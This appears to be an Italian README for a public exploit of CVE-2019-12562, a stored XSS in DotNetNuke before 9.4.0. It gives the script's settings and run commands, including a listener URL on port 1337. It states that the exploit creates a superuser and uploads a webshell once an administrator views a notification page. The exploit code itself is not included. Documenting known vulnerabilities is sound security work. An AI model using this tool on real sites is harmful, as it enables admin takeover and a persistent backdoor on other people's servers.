
Cross-Site Scripting persistente in DotNetNuke (DNN) versioni precedenti alla 9.4.0 | Da XSS a RCE
CVE-2019-12562 La Cross-Site Scripting persistente (Stored XSS) in DotNetNuke (DNN) versioni precedenti alla 9.4.0 consente a un attaccante remoto di memorizzare e incorporare lo script dannoso nella pagina di notifica dell'amministratore. L'exploit può essere utilizzato per compiere qualsiasi azione con privilegi di amministratore, come gestire i contenuti, aggiungere utenti, caricare backdoor sul server, ecc. Lo sfruttamento va a buon fine quando un utente amministratore visita una pagina di notifica con la cross-site scripting memorizzata.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
Questo exploit creerà un superutente e caricherà una webshell sul server di destinazione
Condizione dell'exploit: lo sfruttamento riesce quando un utente amministratore visita una pagina di notifica.
Per saperne di più: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Riferimento CVE: https://www.cvedetails.com/cve/CVE-2019-12562/